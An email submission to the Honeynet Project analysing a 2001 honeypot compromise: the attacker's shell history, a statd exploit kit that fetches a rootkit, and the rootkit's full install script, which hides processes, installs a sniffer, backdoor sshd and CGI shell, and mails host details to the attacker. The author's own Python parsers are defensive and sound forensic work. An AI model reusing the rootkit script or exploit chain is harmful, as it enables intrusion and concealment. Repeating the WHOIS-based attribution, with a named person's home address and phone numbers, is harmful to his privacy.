From fbsi@gamewood.net Sat Mar 17 20:02:35 2001
Date: Sun, 11 Mar 2001 04:28:22 -0500
From: John K. Riggleman Jr.
To: project@honeynet.org
Subject: Analysis of MARCH/2001 "Scan 13"

I've attached a text file detailing what information I could gather on the current scan from experience and otherwise. I hope that it's as interesting to read as it was to create.

Thank you.

----- John K. Riggleman Jr. -----

[ Part 2: "Attached Text" ]

-- March 2001 Scan13 analysis --
-- Typing and Analysis by: John K. Riggleman Jr.

This is my first attempt at submitting any article to Project Honeynet. I usually see the challenges shortly after they are posted and solve them without submitting anything. I particularly enjoyed this scan, however, and have been sitting for several hours on my 100 MHz laptop in Win95 poking at it. I may be slightly incorrect with some of the "these are the only differences" phrases because I am switching between Netscape and EDIT.COM for my comparisons. I would like to thank you for taking the time to read this attempt at a detailed analysis of this month's scan.

------------------------

Disclaimer: The information in this document is pure speculation. Anything which may seem incriminating against any individuals should be held neither as fact nor evidence. Everything contained within this document resulted from research, assumptions, or common sense. Given the same circumstances someone else could reach similar conclusions, and by releasing this I am not trying to bring any negative thoughts or actions about. I am merely entering this as an entry into an intriguing contest and hopefully no one takes offense to such.

--------------------Questions--------------------

1. What is the blackhat attempting to do with his command line syntax?
2. What does the tool accomplish?
3. How does the tool work?
4. Is this tool a worm, or would you classify it as something else?
5. Is this tool original, or is it simply based on previous tools?
   If based on previous tools, which ones and what is modified?
Bonus Question: What information can you obtain about who is using or created the tool?

--------------------Answers--------------------

1) What is the blackhat attempting to do with his command line syntax?

--First 2 lines--
It seems as though the intruder (who has root access, based on the "UID=0" field in the log) is attempting to go to a directory that would not seem suspicious (and the leading "." makes that directory hidden to "ls" without the "-a/-A" arguments).

--3rd and 4th lines--
The intruder is downloading the "LUCKROOT.TAR" file with the lynx browser to the current directory (which would then be /usr/sbin/.mail/).

--5th through 8th lines--
Apparently the intruder had a bit of a problem using the arguments to unpack the file initially (5th line). The next two lines are simply incomplete filenames, so perhaps the person tried and failed using filename auto-completion. Finally, our attacker has successfully unpacked the TAR/GZIPPED file (which is gzipped, as noted by the -z parameter for tar).

The remainder of the commands all go to a script file which formats the user's requests to the scanning program (which I will describe in the remaining questions).

2) What does the tool accomplish?

The tool is a combination of a TCP scanner and a remote statd exploiter. It is used to look for vulnerable systems and exploit them in an automated fashion.

3) How does the tool work?

The user inputs the network range to exploit into the "luckgo" script as leading octets; for example, "./luckgo 216 210" would scan the "216.210.*.*" network, and the script can accept up to 3 parameters to specify a Class-C block (e.g. "./luckgo 216 210 33" would scan 216.210.33.*). The "luckgo" script examines the parameters and then compiles both "luckscan-a" and "luckstatdx". The script passes the network parameters on to the luckscan-a binary, also supplying 111 as the port to scan for (which is the port for the "portmapper" service).
Once a system is found which is accepting connections on port 111, "luckscan-a" executes "luckstatdx -d 0 (IPADDRESS)". The "-d 0" flag makes the offset used in the attack that of a RedHat 6.2, since that is defined on line 125 of luckstatdx.c as types[0]. If the infiltration is successful, a "sh" shell is bound to port 39168. This means a connection to 39168, which is made by luckstatdx, would supply the attacker with a prompt running as the User ID of the process (which would be the rpc service with the root UID of 0). The luckstatdx program then sends the appropriate commands to download http://www.becys.org/xzibit.tar.gz and execute "install". One thing I found particularly odd was the fact that both the "install" file and the commands sent to the remote host attempt to delete the xzibit.tar.gz file.

------The Rootkit which is "xzibit.tar.gz"------

Examination of the "install" file:

Line 1/2: Self-explanatory.
Line 3: Changing the owner of all rootkit files to root.
Lines 5-12: Replacing ifconfig, netstat, ps, and top (all things that would find the malicious user or his sniffer).
Lines 15-25: Create /dev/dsx, which is used by the rootkit's ps and top programs (basically, it is a list of processes to hide).
Lines 26-36: Create /dev/caca, which is used by the rootkit's netstat to determine the ports/IP addresses to hide.
Lines 40-43: Create a directory /dev/ida/.inet to store a sniffer, store an ssh server and its configuration files, create an empty tcp.log, and store a parser for the sniffer's output.
Lines 45-50: Create a new /etc/rc.d/rc.sysinit to restart "hdparm" on restart, and then execute /usr/bin/hdparm. "hdparm" is a file which starts the sniffer and ssh server (which will be running on port 6969 because of the configuration file "s" supplied with it).
Lines 54-77: Places "becys.cgi" into several locations that would be accessible when an apache server is running.
"becys.cgi" is an ELF binary that executes commands in a shell with the UID apache is running as. It does contain the text "This is available only local for httpd testing purposes", but I currently have no means of testing this.
Lines 79-84: Sends hostname/uname (distribution name) in an email to becys@becys.org with the subject "becys rewting".
Line 91: A command to delete the Gzip/Tar. Since it is both here and in the string sent, two requests are made to delete the same file.

The /dev/caca file's contents will be described in the answer to the bonus question.

By the command lines provided, the attacker scanned the following ranges:

216.210.*.*
200.120.*.*
64.120.*.*
216.200.*.* (*)
200.120.*.*
63.1.*.*
216.10.*.*
210.120.*.*
64.1.*.*
216.1.*.*
194.1.*.*
216.1.*.*
210.128.*.*
24.1.*.*
12.20.*.*

(*) -> Used twice, but one time the command line was incorrect. This was corrected shortly after (the correct command was issued 6 seconds after the incorrect one).

4) Is this tool a worm, or would you classify it as something else?

The tool can almost be defined as a worm, but it still needs some interaction to propagate. If the tool would initiate a scan on its own, it could be considered a worm because the spreading of the program(s) would be completely automated.

5) Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified?

http://www.khubla.com/bhack.html#pscan.c" (include the quote)
http://packetstorm.securify.com/0008-exploits/statdx.c

The first link above shows source code which is basically identical to luckscan-a.c. That page shows files which use the QueSO scanner with pscan-a.c to find systems to use an rpc.mountd exploit on. The second link shows the statd exploit that luckstatdx.c was obtained from. The only changes are as follows:

Line 162 (giving credit to the original statdx, but not mentioning the original author's name that is within the statdx.c on the packetstorm site).
Line 189 (changed to download and install the rootkit/sniffer).
Lines 250/498/500 (printf text changed).

As far as I can tell, most of the rootkit portion seems original. To know if the binaries are from another rootkit, you could compare the files against those of known rootkits. The "/dev/caca" and "/dev/dsx" entries could well be hex-edited within the binaries, so those are not a 100% reliable means of assuming that the binaries are original.

Bonus Question) What information can you obtain about who is using or created the tool?

---www.becys.org / becys@becys.org---

Though it is never safe to assume, given the fact that the tool downloads the rootkit from a page, notifies an email at the same page, and that the page is within luckstatdx.c, we can assume that the infiltrator is also the creator/modifier of these files (which would mean the distributor and the creator are the same person/group).

According to a WHOIS lookup of the becys.org domain, we get the following information:

bSoft
1 Hensel Dr. Apt.#Z1F
College Station, Texas 77840
US
Administrative Contact:
Qian Wang  becys@yahoo.com
Phone- (979)862-9233

Here, we have a home phone number and picture of the site's owner:

http://control.physics.tamu.edu/people/person.html/Wang,Qian
1 Hensel Dr. #Z1F
College Station, TX 77840
(409)862-9643

All traffic is accessing the site and email is being sent to it, so that makes it seem viable that he would at least be involved. (I cannot help but chuckle a bit at the amount of information available about him. Three email addresses, address of residence, the information on the school that he attends, and two phone numbers to reach him by. It seems almost like these were clues that were left to solve a mystery. Was it Mr. Green in the library with a pipe?)

Now, on to the /dev/caca file. This file has both IP ranges and ports that are to be hidden.
The ingoing/outgoing port 6969 is clearly hidden because (as you can notice from the "s" config file) this is the port used by the sshd added by the rootkit. Looking up the IP ranges would validate the assumption that this system was compromised for the benefit of the Romanian blackhat community.

193.231.139.x  www.roedu.net    Romanian Education Network
               descr: Allocated to ROEDUNET connected highschools
               country: RO
213.154.137.x  www.pcnet.ro     Bucharest, Romania
193.254.34.x   www.logicnet.ro  LOGIC TELECOM SA Romania

-------------------------------

I have attached the "install" file in case the file is removed from the site in the near future. Also, I attached the data given for the challenge (the blackhat's command history), which would aid in understanding this document.

-------------------------------

#!/bin/sh
unset HISTFILE
chown root.root *
echo -n "Replacing netstat, ps, ifconfig, top... "
rm -rf /sbin/ifconfig
mv ifconfig /sbin/ifconfig
rm -rf /bin/netstat
mv netstat /bin/netstat
rm -rf /bin/ps
mv ps /bin/ps
rm -rf /usr/bin/top
mv top /usr/bin/top
echo "Done"
echo -n "Setting up the /dev filez... "
touch /dev/dsx
>/dev/dsx
echo "3 sl2" >>/dev/dsx
echo "3 sshdu" >>/dev/dsx
echo "3 linsniffer" >>/dev/dsx
echo "3 smurf" >>/dev/dsx
echo "3 slice" >>/dev/dsx
echo "3 mech" >>/dev/dsx
echo "3 muh" >>/dev/dsx
echo "3 bnc" >>/dev/dsx
echo "3 psybnc" >> /dev/dsx
touch /dev/caca
>/dev/caca
echo "1 193.231.139" >>/dev/caca
echo "1 213.154.137" >>/dev/caca
echo "1 193.254.34" >>/dev/caca
echo "3 6969" >>/dev/caca
echo "3 3666" >>/dev/caca
echo "3 31221" >>/dev/caca
echo "3 22546" >>/dev/caca
echo "4 6969" >>/dev/caca
echo "4 2222" >>/dev/caca
echo "Done"
echo "Creating home... "

mkdir -p /dev/ida/.inet
echo "Copying SSHD and shit..."
mv -f linsniffer logclear sense sl2 sshdu s ssh_host_key ssh_random_seed sl2new.c /dev/ida/.inet/
touch /dev/ida/.inet/tcp.log

echo "/usr/bin/hdparm -t1 -X53 -p" >> /etc/rc.d/rc.sysinit
echo >> /etc/rc.d/rc.sysinit
mv hdparm -f /usr/bin/
chmod 500 /usr/bin/hdparm
chattr +i /usr/bin/hdparm
/usr/bin/hdparm

sleep 1

if [ -d /home/httpd/cgi-bin ]
then
mv -f becys.cgi /home/httpd/cgi-bin/
fi

if [ -d /usr/local/httpd/cgi-bin ]
then
mv -f becys.cgi /usr/local/httpd/cgi-bin/
fi

if [ -d /usr/local/apache/cgi-bin ]
then
mv -f becys.cgi /usr/local/apache/cgi-bin/
fi

if [ -d /www/httpd/cgi-bin ]
then
mv -f becys.cgi /www/httpd/cgi-bin/
fi

if [ -d /www/cgi-bin ]
then
mv -f becys.cgi /www/cgi-bin/
fi

touch /tmp/info
/sbin/ifconfig | grep inet >> /tmp/info
hostname -f >> /tmp/info
uname -a >> /tmp/info
cat /tmp/info | mail -s "becys rewting" becys@becys.org
rm -f /tmp/info

echo
echo "All done!"
echo
echo "Way to go , Brukner!...."
cd ..
rm -rf lamerk xzibit.tar.gz

------------------------------------------------

Jan 8 18:47:52 honeypot -bash: HISTORY: PID=1246 UID=0 cd .mail
Jan 8 18:48:00 honeypot -bash: HISTORY: PID=1246 UID=0 cd /usr/sbin/.mail
Jan 8 18:48:12 honeypot -bash: HISTORY: PID=1246 UID=0 lynx www.becys.org/LUCKROOT.TAR
Jan 8 18:48:31 honeypot -bash: HISTORY: PID=1246 UID=0 y
Jan 8 18:48:45 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xvfz LUCKROOT.TAR
Jan 8 18:48:59 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf Lu
Jan 8 18:49:01 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf L
Jan 8 18:49:03 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf LUCKROOT.TAR
Jan 8 18:49:06 honeypot -bash: HISTORY: PID=1246 UID=0 cd luckroot
Jan 8 18:49:13 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 210
Jan 8 18:51:07 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 200 120
Jan 8 18:51:43 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 64 120
Jan 8 18:52:00 honeypot -bash: HISTORY: PID=1246 UID=0 .luckgo 216 200
Jan 8 18:52:06 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 200
Jan 8 18:54:37 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 200 120
Jan 8 18:55:26 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 63 1
Jan 8 18:56:06 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 10
Jan 8 19:06:04 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 210 120
Jan 8 19:07:03 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 64 1
Jan 8 19:07:34 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 1
Jan 8 19:09:41 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 194 1
Jan 8 19:10:53 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 1
Jan 8 19:12:13 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 210 128
Jan 8 19:23:30 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 24 1
Jan 8 19:35:55 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 12 20

------------------------------------------------
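An added example (my own, not part of the challenge material): a parser for the HISTORY lines above that recovers the block each ./luckgo invocation swept, counts repeats, and flags the mistyped ".luckgo" line that never ran. The sample lines are constructed in the log format shown above.

```python
import re
from collections import Counter

# Constructed sample: a few HISTORY lines in the format of the challenge log above
SAMPLE_LOG = """\
Jan 8 18:49:13 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 210
Jan 8 18:51:07 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 200 120
Jan 8 18:52:00 honeypot -bash: HISTORY: PID=1246 UID=0 .luckgo 216 200
Jan 8 18:52:06 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 200
Jan 8 18:54:37 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 200 120
"""

# syslog prefix written by the honeypot's logging bash, then the command itself
HISTORY_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) -bash: HISTORY: "
    r"PID=(?P<pid>\d+) UID=(?P<uid>\d+) (?P<cmd>.*)$"
)
# "./luckgo A B [C]"; also matches the typo ".luckgo" so it can be flagged
LUCKGO_RE = re.compile(r"^\.{1,2}/?luckgo((?:\s+\d{1,3}){1,3})\s*$")

def luckgo_range(args):
    """Map luckgo's 1-3 octet arguments to the CIDR block it sweeps."""
    octets = [int(a) for a in args]
    if not 1 <= len(octets) <= 3 or any(o > 255 for o in octets):
        return None
    prefix = ".".join(str(o) for o in octets + [0] * (4 - len(octets)))
    return f"{prefix}/{8 * len(octets)}"

def parse_history(text):
    """One dict per HISTORY line; luckgo calls get a 'range' and a 'malformed' flag."""
    events = []
    for line in text.splitlines():
        m = HISTORY_RE.match(line)
        if not m:
            continue
        ev = m.groupdict()
        ev["range"], ev["malformed"] = None, False
        lm = LUCKGO_RE.match(ev["cmd"])
        if lm:
            ev["range"] = luckgo_range(lm.group(1).split())
            # ".luckgo" (missing slash) never ran: the typo the analysis points out
            ev["malformed"] = not ev["cmd"].startswith("./luckgo")
        events.append(ev)
    return events

def scanned_ranges(text):
    """How often each block was actually swept (malformed invocations excluded)."""
    return Counter(e["range"] for e in parse_history(text)
                   if e["range"] and not e["malformed"])
```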
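A second added example (again mine, not code from the challenge or the rootkit): it parses the /dev/caca hide list exactly as the install script above writes it and reports which sockets in a constructed "netstat -an" listing the rootkit's replacement netstat would suppress. The type codes are inferred from the values on the page: 1 is an IP prefix, 3 and 4 are ports; which side (local or remote) 3 versus 4 refers to is an assumption, so both ends of each socket are checked.

```python
import re

DEV_CACA = """\
1 193.231.139
1 213.154.137
1 193.254.34
3 6969
3 3666
3 31221
3 22546
4 6969
4 2222
"""

def parse_hide_list(text):
    """Hide list by record type: 1 = IP prefix, 3/4 = port (local/remote mapping assumed)."""
    prefixes, ports = [], set()
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 2:
            continue
        kind, value = parts
        if kind == "1":
            prefixes.append(value.rstrip(".") + ".")
        elif kind in ("3", "4") and value.isdigit():
            ports.add(int(value))
    return prefixes, ports

# proto recv-q send-q local:port remote:port, as printed by netstat -an
SOCKET_RE = re.compile(r"^(tcp|udp)\s+\d+\s+\d+\s+(\S+):(\d+|\*)\s+(\S+):(\d+|\*)")

def would_be_hidden(netstat_line, prefixes, ports):
    """True if the trojaned netstat would drop this line from its output."""
    m = SOCKET_RE.match(netstat_line)
    if not m:
        return False
    _, laddr, lport, raddr, rport = m.groups()
    if any(a.startswith(p) for p in prefixes for a in (laddr, raddr)):
        return True
    return any(p.isdigit() and int(p) in ports for p in (lport, rport))

# Constructed netstat -an lines (not from the challenge)
SAMPLE_NETSTAT = """\
tcp        0      0 0.0.0.0:6969            0.0.0.0:*               LISTEN
tcp        0      0 10.0.0.5:22             193.231.139.20:40321    ESTABLISHED
tcp        0      0 10.0.0.5:80             198.51.100.7:51234      ESTABLISHED
"""

def hidden_lines(netstat_text, hide_list=DEV_CACA):
    """Sockets a clean netstat shows that the rootkit's copy would suppress."""
    prefixes, ports = parse_hide_list(hide_list)
    return [l for l in netstat_text.splitlines() if would_be_hidden(l, prefixes, ports)]
```

Comparing a known-good netstat (for example from a rescue medium) against the trojaned one on the same lines is the practical check; this shows exactly which entries the hide list accounts for.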